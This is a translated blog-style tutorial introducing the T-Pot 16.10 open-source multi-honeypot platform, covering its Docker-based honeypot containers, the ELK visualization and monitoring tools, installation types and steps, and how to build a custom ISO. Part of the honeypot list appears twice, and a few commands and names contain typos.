In the past two years, more and more attention has been paid to honeypot technology, and various honeypots with low interaction, medium interaction, and high interaction degree have gradually formed, ranging from web business honeypots, ssh application honeypots, and network protocol stack honeypots. Each functional honeypot to the system host honeypot. From a honeymark of a word document, to a system-level service honeypot, to a honeynet composed of multi-functional honeypots, to a honey farm composed of a distributed honeynet including flow control redirection.
With the development of virtualization technology, various virtual honeypots have also been developed. High-interaction honeypots can be realized through virtual machines, and business-oriented honeypots realized through docker are no longer the deployment support that required expensive hardware devices in the past. , which also greatly reduces the deployment cost of honeypots. One host can realize the entire multi-functional multi-honeypot high-interaction honeynet architecture integrating data control, data capture and data analysis. There have also been some good open source honeypot products or projects, such as MHN (Modern Honeynet) , HoneypotProject. MHN Modern Honeynet simplifies the deployment of honeypots, integrates a variety of honeypot installation scripts, can be quickly deployed, used, and can quickly collect data from nodes. There are also many foreign companies doing product innovation based on honeypot deception technology.
The high-fidelity and high-quality data set of the honeypot frees security personnel from the tedious process of analyzing massive logs. The connection access to the honeypot is all attack information, and it no longer has a certain lag like the previous feature analysis. Used to catch new types of attacks and methods. Some time ago, the author captured the ssh automatic blasting tool through a high-interaction honeypot, which can perform blasting attempts against the entire Internet, and can automatically identify some low-interaction honeypots.
Now there are so many honeypots for each function. Although MHN simplifies the deployment process of each honeypot, it still needs to manually install multiple system sensors to implement multiple different honeypots. In the process of honeypot research, is there a simpler and more convenient platform to realize our research and use of honeypot?
Here we will introduce an open source multi-honeypot platform T-Pot16.10 , install the system once, easily use a variety of honeypots in it, and provide good visualization. Official English introduction: https://dtag-dev-sec.github.io/mediator/feature/2016/10/31/t-pot-16.10.html
T-Pot16.10 open source multi-honeypot platform
T-Pot16.10 multi-honeypot platform directly provides a system iso, which uses docker technology to realize multiple honeypots, which is more convenient for honeypot research and data capture. The following is the situation of just deploying it to the Internet for 6 hours. Let's first see what it looks like and whether there is any desire to use it.
Do you want to feel it when you see it? Don't get excited or introduce it first.
T-Pot16.10 uses Ubuntuserver 16.04 LTS system and provides the following honeypot containers based on docker technology:
Conpot: A low-interaction industrial control honeypot, which provides a series of general industrial control protocols and can simulate complex industrial control infrastructure.
Cowrie: A medium-interactive ssh honeypot based on kippo changes, which can record brute force attacks on accounts and passwords, and provide a fake file system environment to record hacker operations, and save files downloaded through wget/curl and files uploaded through SFTP and SCP .
Dionaea: Dionaea is an application program running on Linux. It runs the program in a network environment. It opens the default ports of common Internet services. When there is an external connection, it simulates normal services to give feedback, and records the incoming and outgoing network data flow. The network data stream is detected by the detection module and processed by category. If there is shellcode, it will be simulated and executed; the program will automatically download the malicious file specified in the shellcode or specified by the subsequent attack command.
Elasticpot: A honeypot that simulates the elastcisearch RCE vulnerability, and responds to JSON-formatted messages of vulnerable ES instances on requests from /,/_search, /_nodes through a forged function.
Emobility: A high-interaction honeypot container used in T-Pot to collect attack motivations and methods against next-generation transportation infrastructure. The Emobility honeynet consists of a central charging system, several charging points, simulating user transactions. Once the attacker accesses the central control system web interface, it monitors and processes the running charge transaction and interacts with the charge point. In addition to this, at random times, hackers may interact with users who are charging for the vehicle.
Glastopf: Low-Interaction Web Application Honeypot, Glastopf Honeypot It can simulate thousands of web vulnerabilities, respond to the attacker with different attack methods, and then collect data from the attack process on the target web application. Its goal is for automated vulnerability scanning/exploitation tools to achieve low interaction by classifying vulnerability exploitation methods and returning corresponding reasonable results for a certain type of exploitation method.
Honeytrap: Observe attacks against TCP or UDP services, act as a daemon to simulate some well-known services, and can analyze attack strings and execute corresponding download file instructions.
Conpot: A low-interaction industrial control honeypot, which provides a series of general industrial control protocols and can simulate complex industrial control infrastructure.
Cowrie: A medium-interactive ssh honeypot based on kippo changes, which can record brute force attacks on accounts and passwords, and provide a fake file system environment to record hacker operations, and save files downloaded through wget/curl and files uploaded through SFTP and SCP .
Dionaea: Dionaea is an application program running on Linux. It runs the program in a network environment. It opens the default ports of common Internet services. When there is an external connection, it simulates normal services to give feedback, and records the incoming and outgoing network data flow. The network data stream is detected by the detection module and processed by category. If there is shellcode, it will be simulated and executed; the program will automatically download the malicious file specified in the shellcode or specified by the subsequent attack command.
Elasticpot: A honeypot that simulates the elastcisearch RCE vulnerability, and responds to JSON-formatted messages of vulnerable ES instances on requests from /,/_search, /_nodes through a forged function.
Emobility: A high-interaction honeypot container used in T-Pot to collect attack motivations and methods against next-generation transportation infrastructure. The Emobility honeynet consists of a central charging system, several charging points, simulating user transactions. Once the attacker accesses the central control system web interface, it monitors and processes the running charge transaction and interacts with the charge point. In addition to this, at random times, hackers may interact with users who are charging for the vehicle.
Glastopf: Low-Interaction Web Application Honeypot, Glastopf Honeypot It can simulate thousands of web vulnerabilities, respond to the attacker with different attack methods, and then collect data from the attack process on the target web application. Its goal is for automated vulnerability scanning/exploitation tools to achieve low interaction by classifying vulnerability exploitation methods and returning corresponding reasonable results for a certain type of exploitation method.
Honeytrap: Observe attacks against TCP or UDP services, act as a daemon to simulate some well-known services, and can analyze attack strings and execute corresponding download file instructions.
On this platform, the following tools are used:
ELK: Elegant Visualization of Attack Events Captured by T-Pot
Elasticsearch-head: a web frontend to browse and manipulate ElasticSearch clusters
Netdata: Real-time performance monitoring
Portainer: docker web interface
Suricate: An open source network security threat detection engine.
Wetty: ssh client for web interface
T-Pot is a network installation based on Ubuntu server 16.04TLS, so the network connection must be ensured during the installation process. These honeypot daemons or other components are provided through docker virtualization technology. This allows us to run multiple honeypot systems on one network card, and the entire system is better maintained. These honeypot programs are packaged in docker containers to provide good isolation and easier updates. These events can be correlated through the data analysis tool ewsposter, and also supports the data sharing of the honeynet project hpfeeds.
T-Pot honeypot platform structure diagram:
All data in docker is isolated, once the docker container crashes, all data generated by the docker container environment will disappear and a new docker instance will be restarted. Therefore, for some data that needs to be permanently saved, such as configuration files, there is a permanent storage directory /data/ on the host, which can persist after the system or container is restarted. Important log data is also stored in the host file system /data/<container-name> outside the container by specifying the vulnerability option in docker, and applications in the container can record logs to this directory.
The platform needs to meet hardware requirements: T-Pot installation requires at least 4G RAM, 64G disk space, and Internet access.
The system installation steps:
1. Download top.iso or create your own operating system environment.
2. Install on a networked VM or physical machine. The installation process is the same as the normal installation of Ubuntu, which requires setting a password for the tsec user.
3. After the system is installed normally, the installation type will be selected when the system is started for the first time, and the corresponding container service will be downloaded and installed according to the selection.
There are 4 installation types, and different installation types need to meet different requirements. We choose a typical T-Pot installation here.
1)T-Pot Installation (Cowrie, Dionaea, ElasticPot, Glastopf, Honeytrap, ELK, Suricata+P0f & Tools)
2)Sensor Installation (Cowrie, Dionaea, ElasticPot, Glastopf, Honeytrap)
3)Industrial Installation (ConPot, eMobility, ELK, Suricata+P0f & Tools)
4)Everything Installation (Everything, all of the above)
Set the web account password later, fill in some relevant information, and automatically complete the docker image installation and download. After the installation is successful, restart the system and enter the following page:
The red ones are the public IP addresses.
The installation may fail due to source reasons or network instability during the installation process. At this time, you can log in to the system later. The user name is tsec, and the password is the password set when the system was installed. Perform sudo su operation to escalate permissions, and manually execute /root The installation script of /install.sh, the script detects that it is not the first installation and will automatically terminate. This is to clear the files /root/install.err, /root/install.log and the following error reminders, or according to the actual situation Comment out the work that the script has already done, and only continue with commands that were interrupted unfinished.
4. Start using it happily.
Access the T-Pot Control Panel via a browser at https://ip:64297 . Log in via the web account password authentication created during installation.
Previously, we have displayed various attack events through the Kibana panel, and we can also design the visual display of these panels according to our own needs .
In order to capture the attack here, the T-Pot platform needs to be placed on the Internet, otherwise no attack will be captured. I put the T-Pot on the Internet here by setting up the DMZ on the router. If you implement a NAT translation on the router, you need to do NAT translation for these ports here.
The T-Pot platform not only provides honeypot data capture, but also has powerful ELK for data processing and analysis, and can also process Elk clusters. The multi-honeypot integrated in T-Pot can be distributed and deployed on multiple systems for data capture And unified to provide visual analysis display.
It also provides the web control interface of docker, which can directly manage and control our various honeypot containers through the web interface. It is also possible to design your own container honeypot or container service as needed.
It also provides a Web ssh client. You can log in to the system directly through the web console to operate. The actual 22-port ssh service of the system is actually a cowrie honeypot. In this way, we can easily log in to the actual system through the console, and the design is convenient.
There is also a powerful system performance monitoring platform that monitors the resource usage of the host system and each container in real time.
You can also use ISO Creator to create your own ISO installation image.
Create image requirements:
Ubuntu 16.04 LTS or newer system as the host system, other systems have not been tested, at least 4G memory, 32G disk space.
Create an ISO image:
1. Clone the repository and enter the directory
git clone https://github.com/dtag-dev-sec/tpotce.git
cd potce
2. Call the script to create the ISO image, this script will download and install some necessary dependencies. It will download the ubuntu network installation image (about 50M) that T-Pot is based on.
sudo./makeiso.sh
After success, you will find two files tpot.iso and tpot.sha256 in the directory.
Now you can play the honeypot easily. Some time ago, I also encapsulated some docker high-interaction honeypot containers, which can now be easily integrated into the T-Pot platform, making honeypot deployment simpler and more functional.